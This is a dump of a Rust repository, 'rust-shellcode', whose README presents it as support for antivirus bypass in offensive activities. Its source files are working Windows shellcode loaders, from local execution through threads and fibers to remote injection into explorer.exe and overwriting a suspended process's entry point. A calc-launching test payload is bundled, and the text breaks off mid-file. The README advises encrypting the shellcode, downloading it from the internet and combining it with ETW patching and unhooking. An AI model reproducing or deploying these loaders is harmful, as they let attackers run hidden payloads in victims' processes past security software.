[ { "path": ".gitignore", "content": "# Generated by Cargo\r\n# will have compiled files and executables\r\ntarget/\r\n\r\n# These are backup files generated by rustfmt\r\n**/*.rs.bk\r\n\r\n.idea/" }, { "path": "Cargo.toml", "content": "[workspace]\nresolver = \"2\"\nmembers = [\n \"asm\",\n \"create_fiber\",\n \"create_process\",\n \"create_remote_thread\",\n \"create_remote_thread_native\",\n \"create_thread\",\n \"create_thread_native\",\n \"early_bird\",\n \"etwp_create_etw_thread\",\n \"memmap2_transmute\",\n \"module_stomping\",\n \"nt_queue_apc_thread_ex_local\",\n \"rtl_create_user_thread\",\n]" }, { "path": "LICENSE", "content": "MIT License\n\nCopyright (c) 2023 b1n \n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n" }, { "path": "README.md", "content": "# 🤖 rust-shellcode 🤖\r\nThis project provides the underlying support for bypass av of offensive activities. \r\nThe available Shellcode loaders include:\r\n* [asm](#asm)\r\n* [create_fiber](#create_fiber)\r\n* [create_process](#create_process)\r\n* [create_remote_thread](#create_remote_thread)\r\n* [create_remote_thread_native](#create_remote_thread_native)\r\n* [create_thread](#create_thread)\r\n* [create_thread_native](#create_thread_native)\r\n* [early_bird](#early_bird)\r\n* [etwp_create_etw_thread](#etwp_create_etw_thread)\r\n* [memmap2_transmute](#memmap2_transmute)\r\n* [module_stomping](#module_stomping)\r\n* [nt_queue_apc_thread_ex_local](#nt_queue_apc_thread_ex_local)\r\n* [rtl_create_user_thread](#rtl_create_user_thread)\r\n\r\n## Build\r\nThis is a rust project, you need install [rust](https://www.rust-lang.org/) first. \r\nThen, you can build with follow command:\r\n\r\n```shell\r\ncargo build --release\r\n```\r\n\r\nBinarys in `target/release`\r\n\r\n## How to use\r\nThis project is just a basic demo, you need to choose the right loading method, \r\nencrypt the SHELLCODE, download the SHELLCODE from the internet, \r\nor use it with ETW patch, unhooking, etc.\r\n\r\n## asm\r\nSHELLCODE execute locally.\r\n1. link SHELLCODE to .text section\r\n2. inline asm using asm! macro\r\n3. call SHELLCODE\r\n\r\n## create_fiber\r\nSHELLCODE execute locally.\r\n1. convert current thread to fiber using `ConvertThreadToFiber`\r\n2. alloc memory using `VirtualAlloc`\r\n3. copy SHELLCODE to allocated memory using `std::ptr::copy`\r\n4. create a fiber using `CreateFiber`\r\n5. jump SHELLCODE using `SwitchToFiber`\r\n6. jump back\r\n\r\n## create_process\r\nSHELLCODE execute locally.\r\n1. create a process in `CREATE_SUSPENDED` state using `CreateProcessA`\r\n2. alloc remote memory using `VirtualAllocEx`\r\n3. copy SHELLCODE to allocated memory using `WriteProcessMemory`\r\n4. change memory permission to executable using `VirtualProtectEx`\r\n5. get `PROCESS_BASIC_INFORMATION` using `NtQueryInformationProcess`\r\n6. get `PEB` using `ReadProcessMemory`\r\n7. get `IMAGE_DOS_HEADER` using `ReadProcessMemory`\r\n8. get `IMAGE_FILE_HEADER` using `ReadProcessMemory`\r\n9. determine `IMAGE_FILE_HEADER.Machine` is x86 or x64\r\n10. get `[IMAGE_OPTIONAL_HEADER32|IMAGE_OPTIONAL_HEADER64]` using `ReadProcessMemory`\r\n11. let `entrypoint` = `ImageBaseAddress` + `[IMAGE_OPTIONAL_HEADER32|IMAGE_OPTIONAL_HEADER64].AddressOfEntryPoint`\r\n12. write a piece of assembly code to the `entrypoint` to jump to the SHELLCODE using `WriteProcessMemory`\r\n13. resume process's thread using `ResumeThread`\r\n14. close opened handle using `CloseHandle`\r\n\r\n## create_remote_thread\r\nSHELLCODE execute remotely. \r\ninject `explorer.exe` by default.\r\n1. get pid by process name using crate `sysinfo`\r\n2. get handle using `OpenProcess`\r\n3. alloc remote memory using `VirtualAllocEx`\r\n4. copy SHELLCODE to allocated memory using `WriteProcessMemory`\r\n5. change memory permission to executable using `VirtualProtectEx`\r\n6. execute SHELLCODE using `CreateRemoteThread`\r\n7. close opened handle using `CloseHandle`\r\n\r\n## create_remote_thread_native\r\nSHELLCODE execute remotely. \r\ninject `explorer.exe` by default. \r\nthis is same with [create_remote_thread](#create_remote_thread), but without crate `windows-sys` \r\nusing crate `libloading` get functions from dlls.\r\n\r\n## create_thread\r\nSHELLCODE execute locally.\r\n1. alloc remote memory using `VirtualAlloc`\r\n2. copy SHELLCODE to allocated memory using `std::ptr::copy`\r\n3. change memory permission to executable using `VirtualProtect`\r\n4. execute SHELLCODE using `CreateThread`\r\n5. waiting thread exit using `WaitForSingleObject`\r\n\r\n## create_thread_native\r\nSHELLCODE execute locally. \r\nthis is same with [create_thread](#create_thread), but without crate `windows-sys` \r\nusing crate `libloading` get functions from dlls.\r\n\r\n## early_bird\r\nSHELLCODE execute remotely. \r\ncreate and inject `svchost.exe` by default.\r\n1. create a process using `CreateProcessA`\r\n2. alloc remote memory using `VirtualAllocEx`\r\n3. copy SHELLCODE to allocated memory using `WriteProcessMemory`\r\n4. change memory permission to executable using `VirtualProtectEx`\r\n5. execute process using `QueueUserAPC`\r\n6. resume process's thread using `ResumeThread`\r\n7. close opened handle using `CloseHandle`\r\n\r\n## etwp_create_etw_thread\r\nSHELLCODE execute locally.\r\n1. get `EtwpCreateEtwThread` funtion from `ntdll` using `LoadLibraryA` and `GetProcAddress`\r\n2. alloc remote memory using `VirtualAlloc`\r\n3. copy SHELLCODE to allocated memory using `std::ptr::copy`\r\n4. change memory permission to executable using `VirtualProtect`\r\n5. execute SHELLCODE using `EtwpCreateEtwThread`\r\n6. waiting thread exit using `WaitForSingleObject`\r\n\r\n## memmap2_transmute\r\nSHELLCODE execute locally.\r\n1. alloc memory using crate `memmap2`\r\n2. copy SHELLCODE using `copy_from_slice` function from `MmapMut` struct\r\n3. change memory permission to executable using `make_exec` funtion from `MmapMut` struct\r\n4. convert memory pointer to fn type using `transmute`\r\n5. execute fn\r\n\r\n## module_stomping\r\nSHELLCODE execute remotely. \r\ninject `notepad.exe` by default.\r\n1. get pid by process name using crate `sysinfo`\r\n2. get handle using `OpenProcess`\r\n3. alloc remote memory using `VirtualAllocEx`\r\n4. copy dll path to allocated memory using `WriteProcessMemory`\r\n5. get `LoadLibraryA` addr using `GetProcAddress` with `GetModuleHandleA`\r\n6. load dll using `CreateRemoteThread`\r\n7. wait created remote thread using `WaitForSingleObject`\r\n8. get modules using `EnumProcessModules`\r\n9. get module name using `GetModuleBaseNameA`\r\n10. alloc memory using `HeapAlloc`\r\n11. get entry_point using `ReadProcessMemory`\r\n12. copy SHELLCODE to dll entry_point using `WriteProcessMemory`\r\n13. execute SHELLCODE using `CreateRemoteThread`\r\n14. close opened handle using `CloseHandle`\r\n\r\n## nt_queue_apc_thread_ex_local\r\nSHELLCODE execute locally.\r\n1. get `NtQueueApcThreadEx` function from `ntdll` using `LoadLibraryA` and `GetProcAddress`\r\n2. alloc remote memory using `VirtualAlloc`\r\n3. copy SHELLCODE to allocated memory using `std::ptr::copy`\r\n4. change memory permission to executable using `VirtualProtect`\r\n5. get current thread handle using `GetCurrentThread`\r\n6. execute SHELLCODE using `NtQueueApcThreadEx`\r\n\r\n## rtl_create_user_thread\r\nSHELLCODE execute remotely. \r\ninject `explorer.exe` by default.\r\n1. get `RtlCreateUserThread` funtion from `ntdll` using `LoadLibraryA` and `GetProcAddress`\r\n2. get pid by process name using crate `sysinfo`\r\n3. get handle using `OpenProcess`\r\n4. alloc remote memory using `VirtualAllocEx`\r\n5. copy SHELLCODE to allocated memory using `WriteProcessMemory`\r\n6. change memory permission to executable using `VirtualProtectEx`\r\n7. execute SHELLCODE using `RtlCreateUserThread`\r\n8. close opened handle using `CloseHandle`\r\n" }, { "path": "asm/Cargo.toml", "content": "[package]\nname = \"asm\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\n" }, { "path": "asm/src/main.rs", "content": "use std::arch::asm;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n #[link_section = \".text\"]\n static SHELLCODE: [u8; 98] = *include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n\n unsafe {\n asm!(\n \"call {}\",\n in(reg) SHELLCODE.as_ptr(),\n )\n }\n}\n" }, { "path": "create_fiber/Cargo.toml", "content": "[package]\nname = \"create_fiber\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Threading\", \"Win32_System_Memory\", \"Win32_Foundation\"] }\n" }, { "path": "create_fiber/src/main.rs", "content": "use std::mem::transmute;\nuse std::ptr::{copy, null};\nuse windows_sys::Win32::Foundation::{GetLastError, FALSE};\nuse windows_sys::Win32::System::Memory::{\n VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::{ConvertThreadToFiber, CreateFiber, SwitchToFiber};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n let shellcode_size = shellcode.len();\n\n unsafe {\n let main_fiber = ConvertThreadToFiber(null());\n if main_fiber.is_null() {\n panic!(\"[-]ConvertThreadToFiber failed: {}!\", GetLastError());\n }\n\n let addr = VirtualAlloc(\n null(),\n shellcode_size,\n MEM_COMMIT | MEM_RESERVE,\n PAGE_READWRITE,\n );\n if addr.is_null() {\n panic!(\"[-]VirtualAlloc failed: {}!\", GetLastError());\n }\n\n let mut old = PAGE_READWRITE;\n copy(shellcode.as_ptr(), addr.cast(), shellcode_size);\n let res = VirtualProtect(addr, shellcode_size, PAGE_EXECUTE, &mut old);\n if res == FALSE {\n panic!(\"[-]VirtualProtect failed: {}!\", GetLastError());\n }\n\n let func = transmute(addr);\n let fiber = CreateFiber(0, func, null());\n if fiber.is_null() {\n panic!(\"[-]CreateFiber failed: {}!\", GetLastError());\n }\n\n SwitchToFiber(fiber);\n SwitchToFiber(main_fiber);\n }\n}\n" }, { "path": "create_process/Cargo.toml", "content": "[package]\nname = \"create_process\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Threading\", \"Win32_Foundation\", \"Win32_Security\", \"Win32_System_Diagnostics_Debug\", \"Win32_System_Memory\", \"Win32_System_Kernel\", \"Win32_System_SystemServices\", \"Win32_System_SystemInformation\"] }\n" }, { "path": "create_process/src/main.rs", "content": "use std::ffi::{c_char, c_void};\nuse std::mem::{size_of_val, zeroed};\nuse std::ptr::{addr_of, addr_of_mut, null, null_mut};\nuse windows_sys::Win32::Foundation::{CloseHandle, GetLastError, FALSE, STATUS_SUCCESS, TRUE};\nuse windows_sys::Win32::System::Diagnostics::Debug::{\n ReadProcessMemory, WriteProcessMemory, IMAGE_FILE_HEADER, IMAGE_OPTIONAL_HEADER32,\n IMAGE_OPTIONAL_HEADER64,\n};\nuse windows_sys::Win32::System::Memory::{\n VirtualAllocEx, VirtualProtectEx, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE_READ, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::SystemServices::IMAGE_DOS_HEADER;\nuse windows_sys::Win32::System::Threading::{\n CreateProcessA, NtQueryInformationProcess, ResumeThread, CREATE_SUSPENDED,\n PROCESS_BASIC_INFORMATION, PROCESS_INFORMATION, STARTF_USESTDHANDLES, STARTUPINFOA,\n};\n\nconst X64: u16 = 0x8664_u16;\nconst X86: u16 = 0x14c_u16;\nconst MZ: u16 = 0x5a4d_u16;\nconst PE: u32 = 0x4550_u32;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n let shellcode_size = shellcode.len();\n let program = b\"C:\\\\Windows\\\\System32\\\\calc.exe\\0\";\n\n #[repr(C)]\n struct Peb {\n reserved: [c_char; 0x10],\n image_base_address: *mut c_void,\n }\n\n unsafe {\n let mut process_info: PROCESS_INFORMATION = zeroed();\n\n let mut startup_info: STARTUPINFOA = zeroed();\n startup_info.dwFlags = STARTF_USESTDHANDLES | CREATE_SUSPENDED;\n startup_info.wShowWindow = 1;\n\n let res = CreateProcessA(\n program.as_ptr(),\n null_mut(),\n null(),\n null(),\n TRUE,\n CREATE_SUSPENDED,\n null(),\n null(),\n addr_of!(startup_info),\n addr_of_mut!(process_info),\n );\n if res == FALSE {\n panic!(\"[-]CreateProcessA failed: {}!\", GetLastError());\n }\n\n let addr = VirtualAllocEx(\n process_info.hProcess,\n null(),\n shellcode_size,\n MEM_COMMIT | MEM_RESERVE,\n PAGE_READWRITE,\n );\n if addr.is_null() {\n panic!(\"[-]VirtualAllocEx failed: {}!\", GetLastError());\n }\n\n let res = WriteProcessMemory(\n process_info.hProcess,\n addr,\n shellcode.as_ptr().cast(),\n shellcode_size,\n null_mut(),\n );\n if res == FALSE {\n panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n }\n\n let mut old = PAGE_READWRITE;\n let res = VirtualProtectEx(\n process_info.hProcess,\n addr,\n shellcode_size,\n PAGE_EXECUTE_READ,\n addr_of_mut!(old),\n );\n if res == FALSE {\n panic!(\"[-]VirtualProtectEx failed: {}!\", GetLastError());\n }\n\n let mut process_basic_info: PROCESS_BASIC_INFORMATION = zeroed();\n let res = NtQueryInformationProcess(\n process_info.hProcess,\n 0,\n addr_of_mut!(process_basic_info).cast(),\n u32::try_from(size_of_val(&process_basic_info)).expect(\"[-]u32::try_from failed!\"),\n null_mut(),\n );\n if res != STATUS_SUCCESS {\n panic!(\"[-]NtQueryInformationProcess failed: {}!\", GetLastError());\n }\n\n let read_process_memory = |addr: *const c_void, out: *mut c_void, size: usize| {\n let res = ReadProcessMemory(process_info.hProcess, addr, out, size, null_mut());\n if res == FALSE {\n panic!(\"[-]ReadProcessMemory failed: {}!\", GetLastError());\n }\n };\n\n let mut peb: Peb = zeroed();\n read_process_memory(\n process_basic_info.PebBaseAddress.cast(),\n addr_of_mut!(peb).cast(),\n size_of_val(&peb),\n );\n\n let mut dos_header: IMAGE_DOS_HEADER = zeroed();\n read_process_memory(\n peb.image_base_address,\n addr_of_mut!(dos_header).cast(),\n size_of_val(&dos_header),\n );\n if dos_header.e_magic != MZ {\n panic!(\"[-]DOS image header magic was not 0x5a4d!\");\n }\n\n let mut signature = 0u32;\n read_process_memory(\n ((peb.image_base_address as usize) + (dos_header.e_lfanew as usize)) as *const c_void,\n addr_of_mut!(signature).cast(),\n size_of_val(&signature),\n );\n if signature != PE {\n panic!(\"[-]PE Signature was not 0x4550\");\n }\n\n let mut pe_header: IMAGE_FILE_HEADER = zeroed();\n read_process_memory(\n ((peb.image_base_address as usize)\n + (dos_header.e_lfanew as usize)\n + size_of_val(&signature)) as *const c_void,\n addr_of_mut!(pe_header).cast(),\n size_of_val(&pe_header),\n );\n\n let entrypoint;\n let mut ep_buffer = vec![];\n\n let read_opt_header = |header: *mut c_void, size: usize| {\n read_process_memory(\n ((peb.image_base_address as usize)\n + (dos_header.e_lfanew as usize)\n + size_of_val(&signature)\n + size_of_val(&pe_header)) as *const c_void,\n header,\n size,\n );\n };\n\n match pe_header.Machine {\n X64 => {\n let mut opt_header: IMAGE_OPTIONAL_HEADER64 = zeroed();\n read_opt_header(addr_of_mut!(opt_header).cast(), size_of_val(&opt_header));\n\n entrypoint = ((peb.image_base_address as usize)\n + usize::try_from(opt_header.AddressOfEntryPoint)\n .expect(\"[-]usize::try_from failed!\"))\n as *mut c_void;\n\n // rex; mov eax\n ep_buffer.push(0x48_u8);\n ep_buffer.push(0xb8_u8);\n let mut shellcode_addr = (addr as usize).to_le_bytes().to_vec();\n ep_buffer.append(&mut shellcode_addr);\n }\n X86 => {\n let mut opt_header: IMAGE_OPTIONAL_HEADER32 = zeroed();\n read_opt_header(addr_of_mut!(opt_header).cast(), size_of_val(&opt_header));\n\n entrypoint = ((peb.image_base_address as usize)\n + usize::try_from(opt_header.AddressOfEntryPoint)\n .expect(\"[-]usize::try_from failed!\"))\n as *mut c_void;\n\n // mov eax\n ep_buffer.push(0xb8_u8);\n let mut shellcode_addr = (addr as usize).to_le_bytes().to_vec();\n ep_buffer.append(&mut shellcode_addr);\n }\n _ => panic!(\n \"[-]Unknow IMAGE_OPTIONAL_HEADER type for machine type: {:#x}\",\n pe_header.Machine\n ),\n }\n\n // jmp [r|e]ax\n ep_buffer.push(0xff_u8);\n ep_buffer.push(0xe0_u8);\n\n let res = WriteProcessMemory(\n process_info.hProcess,\n entrypoint,\n ep_buffer.as_ptr().cast(),\n ep_buffer.len(),\n null_mut(),\n );\n if res == FALSE {\n panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n }\n\n let res = ResumeThread(process_info.hThread);\n if res == 0u32 {\n panic!(\"[-]ResumeThread failed: {}!\", GetLastError());\n }\n\n let res = CloseHandle(process_info.hProcess);\n if res == FALSE {\n panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n }\n\n let res = CloseHandle(process_info.hThread);\n if res == FALSE {\n panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n }\n }\n}\n" }, { "path": "create_remote_thread/Cargo.toml", "content": "[package]\nname = \"create_remote_thread\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nsysinfo = \"0.29.0\"\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Memory\", \"Win32_Foundation\", \"Win32_System_Threading\", \"Win32_System_Diagnostics_Debug\", \"Win32_Security\"] }\n" }, { "path": "create_remote_thread/src/main.rs", "content": "use std::mem::transmute;\nuse std::ptr::{null, null_mut};\nuse sysinfo::{PidExt, ProcessExt, System, SystemExt};\nuse windows_sys::Win32::Foundation::{CloseHandle, GetLastError, FALSE};\nuse windows_sys::Win32::System::Diagnostics::Debug::WriteProcessMemory;\nuse windows_sys::Win32::System::Memory::{\n VirtualAllocEx, VirtualProtectEx, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::{CreateRemoteThread, OpenProcess, PROCESS_ALL_ACCESS};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n let shellcode_size = shellcode.len();\n\n let mut system = System::new();\n system.refresh_processes();\n\n let pid = system\n .processes_by_name(\"explorer.exe\")\n .next()\n .expect(\"[-]no process!\")\n .pid()\n .as_u32();\n\n unsafe {\n let handle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);\n if handle == 0 {\n panic!(\"[-]OpenProcess failed: {}!\", GetLastError());\n }\n\n let addr = VirtualAllocEx(\n handle,\n null(),\n shellcode_size,\n MEM_COMMIT | MEM_RESERVE,\n PAGE_READWRITE,\n );\n if addr.is_null() {\n panic!(\"[-]VirtualAllocEx failed: {}!\", GetLastError());\n }\n\n let res = WriteProcessMemory(\n handle,\n addr,\n shellcode.as_ptr().cast(),\n shellcode_size,\n null_mut(),\n );\n if res == FALSE {\n panic!(\"[-]WriteProcessMemory failed: {}!\", GetLastError());\n }\n\n let mut old = PAGE_READWRITE;\n let res = VirtualProtectEx(handle, addr, shellcode_size, PAGE_EXECUTE, &mut old);\n if res == FALSE {\n panic!(\"[-]VirtualProtectEx failed: {}!\", GetLastError());\n }\n\n let func = transmute(addr);\n let thread = CreateRemoteThread(handle, null(), 0, func, null(), 0, null_mut());\n if thread == 0 {\n panic!(\"[-]CreateRemoteThread failed: {}!\", GetLastError());\n }\n\n let res = CloseHandle(handle);\n if res == FALSE {\n panic!(\"[-]CloseHandle failed: {}!\", GetLastError());\n }\n }\n}\n" }, { "path": "create_remote_thread_native/Cargo.toml", "content": "[package]\nname = \"create_remote_thread_native\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nlibloading = \"0.8.0\"\nsysinfo = \"0.29.0\"\n" }, { "path": "create_remote_thread_native/src/main.rs", "content": "use libloading::{Library, Symbol};\nuse std::ffi::c_void;\nuse std::ptr::{null, null_mut};\nuse sysinfo::{PidExt, ProcessExt, System, SystemExt};\n\nconst PROCESS_ALL_ACCESS: u32 = 0x1fffff;\nconst MEM_COMMIT: u32 = 0x1000;\nconst MEM_RESERVE: u32 = 0x2000;\nconst PAGE_EXECUTE: u32 = 0x10;\nconst PAGE_READWRITE: u32 = 0x04;\nconst FALSE: i32 = 0;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n let shellcode_size = shellcode.len();\n\n let mut system = System::new();\n system.refresh_processes();\n let pid = system\n .processes_by_name(\"explorer.exe\")\n .next()\n .expect(\"[-]no process!\")\n .pid()\n .as_u32();\n\n unsafe {\n let kernel32 = Library::new(\"kernel32.dll\").expect(\"[-]no kernel32.dll!\");\n\n let get_last_error: Symbol u32> = kernel32\n .get(b\"GetLastError\\0\")\n .expect(\"[-]no GetLastError!\");\n\n let open_process: Symbol isize> =\n kernel32.get(b\"OpenProcess\\0\").expect(\"[-]no OpenProcess!\");\n\n let virtual_alloc_ex: Symbol<\n unsafe extern \"C\" fn(isize, *const c_void, usize, u32, u32) -> *mut c_void,\n > = kernel32\n .get(b\"VirtualAllocEx\\0\")\n .expect(\"[-]no VirtualAllocEx!\");\n\n let write_process_memory: Symbol<\n unsafe extern \"C\" fn(isize, *const c_void, *const c_void, usize, *mut usize) -> i32,\n > = kernel32\n .get(b\"WriteProcessMemory\\0\")\n .expect(\"[-]no WriteProcessMemory!\");\n\n let virtual_protect_ex: Symbol<\n unsafe extern \"C\" fn(isize, *const c_void, usize, u32, *mut u32) -> i32,\n > = kernel32\n .get(b\"VirtualProtectEx\\0\")\n .expect(\"[-]no VirtualProtectEx!\");\n\n let create_remote_thread: Symbol<\n unsafe extern \"C\" fn(\n isize,\n *const c_void,\n usize,\n *const c_void,\n u32,\n *mut u32,\n ) -> isize,\n > = kernel32\n .get(b\"CreateRemoteThread\\0\")\n .expect(\"[-]no CreateRemoteThread!\");\n\n let close_handle: Symbol i32> =\n kernel32.get(b\"CloseHandle\").expect(\"[-]no CloseHandle!\");\n\n let handle = open_process(PROCESS_ALL_ACCESS, 0, pid);\n if handle == 0 {\n panic!(\"[-]OpenProcess failed: {}!\", get_last_error());\n }\n\n let addr = virtual_alloc_ex(\n handle,\n null(),\n shellcode_size,\n MEM_COMMIT | MEM_RESERVE,\n PAGE_READWRITE,\n );\n if addr.is_null() {\n panic!(\"[-]virtual_alloc_ex failed: {}!\", get_last_error());\n }\n\n let res = write_process_memory(\n handle,\n addr,\n shellcode.as_ptr().cast(),\n shellcode_size,\n null_mut(),\n );\n if res == FALSE {\n panic!(\"[-]write_process_memory failed: {}!\", get_last_error());\n }\n\n let mut old = PAGE_READWRITE;\n let res = virtual_protect_ex(handle, addr, shellcode_size, PAGE_EXECUTE, &mut old);\n if res == FALSE {\n panic!(\"[-]virtual_protect_ex failed: {}!\", get_last_error());\n }\n\n let thread = create_remote_thread(handle, null(), 0, addr, 0, null_mut());\n if thread == 0 {\n panic!(\"[-]create_remote_thread failed: {}!\", get_last_error());\n }\n\n let res = close_handle(handle);\n if res == FALSE {\n panic!(\"[-]close_handle failed: {}!\", get_last_error());\n }\n }\n}\n" }, { "path": "create_thread/Cargo.toml", "content": "[package]\nname = \"create_thread\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Memory\", \"Win32_Foundation\", \"Win32_System_Threading\", \"Win32_Security\"] }" }, { "path": "create_thread/src/main.rs", "content": "use std::mem::transmute;\nuse std::ptr::{copy, null, null_mut};\nuse windows_sys::Win32::Foundation::{GetLastError, FALSE, WAIT_FAILED};\nuse windows_sys::Win32::System::Memory::{\n VirtualAlloc, VirtualProtect, MEM_COMMIT, MEM_RESERVE, PAGE_EXECUTE, PAGE_READWRITE,\n};\nuse windows_sys::Win32::System::Threading::{CreateThread, WaitForSingleObject};\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n let shellcode_size = shellcode.len();\n\n unsafe {\n let addr = VirtualAlloc(\n null(),\n shellcode_size,\n MEM_COMMIT | MEM_RESERVE,\n PAGE_READWRITE,\n );\n if addr.is_null() {\n panic!(\"[-]VirtualAlloc failed: {}!\", GetLastError());\n }\n\n copy(shellcode.as_ptr(), addr.cast(), shellcode_size);\n\n let mut old = PAGE_READWRITE;\n let res = VirtualProtect(addr, shellcode_size, PAGE_EXECUTE, &mut old);\n if res == FALSE {\n panic!(\"[-]VirtualProtect failed: {}!\", GetLastError());\n }\n\n let addr = transmute(addr);\n let thread = CreateThread(null(), 0, addr, null(), 0, null_mut());\n if thread == 0 {\n panic!(\"[-]CreateThread failed: {}!\", GetLastError());\n }\n\n WaitForSingleObject(thread, WAIT_FAILED);\n }\n}\n" }, { "path": "create_thread_native/Cargo.toml", "content": "[package]\nname = \"create_thread_native\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nlibloading = \"0.8.0\"" }, { "path": "create_thread_native/src/main.rs", "content": "use libloading::{Library, Symbol};\nuse std::ffi::c_void;\nuse std::ptr::{null, null_mut};\n\nconst MEM_COMMIT: u32 = 0x1000;\nconst MEM_RESERVE: u32 = 0x2000;\nconst PAGE_EXECUTE: u32 = 0x10;\nconst PAGE_READWRITE: u32 = 0x04;\nconst FALSE: i32 = 0;\nconst WAIT_FAILED: u32 = 0xFFFFFFFF;\n\n#[cfg(target_os = \"windows\")]\nfn main() {\n let shellcode = include_bytes!(\"../../w64-exec-calc-shellcode-func.bin\");\n let shellcode_size = shellcode.len();\n\n unsafe {\n let kernel32 = Library::new(\"kernel32.dll\").expect(\"[-]no kernel32.dll!\");\n let ntdll = Library::new(\"ntdll.dll\").expect(\"[-]no ntdll.dll!\");\n\n let get_last_error: Symbol u32> = kernel32\n .get(b\"GetLastError\\0\")\n .expect(\"[-]no GetLastError!\");\n\n let virtual_alloc: Symbol<\n unsafe extern \"C\" fn(*const c_void, usize, u32, u32) -> *mut c_void,\n > = kernel32\n .get(b\"VirtualAlloc\\0\")\n .expect(\"[-]no VirtualAlloc!\");\n\n let virtual_protect: Symbol<\n unsafe extern \"C\" fn(*const c_void, usize, u32, *mut u32) -> i32,\n > = kernel32\n .get(b\"VirtualProtect\\0\")\n .expect(\"[-]no VirtualProtect!\");\n\n let rtl_copy_memory: Symbol =\n ntdll.get(b\"RtlCopyMemory\\0\").expect(\"[-]no RtlCopyMemory!\");\n\n let create_thread: Symbol<\n unsafe extern \"C\" fn(*const c_void, usize, *const c_void, u32, *mut u32) -> isize,\n > = kernel32\n .get(b\"CreateThread\\0\")\n .expect(\"[-]no CreateThread!\");\n\n let wait_for_single_object: Symbol u32> = kernel32\n .get(b\"WaitForSingleObject\")\n .expect(\"[-]no WaitForSingleObject!\");\n\n let addr = virtual_alloc(\n null(),\n shellcode_size,\n MEM_COMMIT | MEM_RESERVE,\n PAGE_READWRITE,\n );\n if addr.is_null() {\n panic!(\"[-]virtual_alloc failed: {}!\", get_last_error());\n }\n\n rtl_copy_memory(addr, shellcode.as_ptr().cast(), shellcode_size);\n\n let mut old = PAGE_READWRITE;\n let res = virtual_protect(addr, shellcode_size, PAGE_EXECUTE, &mut old);\n if res == FALSE {\n panic!(\"[-]virtual_protect failed: {}!\", get_last_error());\n }\n\n let handle = create_thread(null(), 0, addr, 0, null_mut());\n if handle == 0 {\n panic!(\"[-]create_thread failed: {}!\", get_last_error());\n }\n\n wait_for_single_object(handle, WAIT_FAILED);\n }\n}\n" }, { "path": "early_bird/Cargo.toml", "content": "[package]\nname = \"early_bird\"\nversion = \"0.1.0\"\nedition = \"2021\"\n\n# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html\n\n[dependencies]\nwindows-sys = { version = \"0.48.0\", features = [\"Win32_System_Threading\", \"Win32_Foundation\", \"Win32_Security\", \"Win32_System_Memory\", \"Win32_System_Diagnostics_Debug\"] }\n" }, { "path": "early_bird/src/main.rs", "content": "use std::mem::{transmute, zeroed};\nuse std::ptr::{null, null_mut};\nuse windows_sys::Win32::Foundation::{CloseHandle, GetLastError, FALSE, TRUE};\nuse windows_sys::Win32::System::Diagnostics::Debug::WriteProcessMemory;\nuse 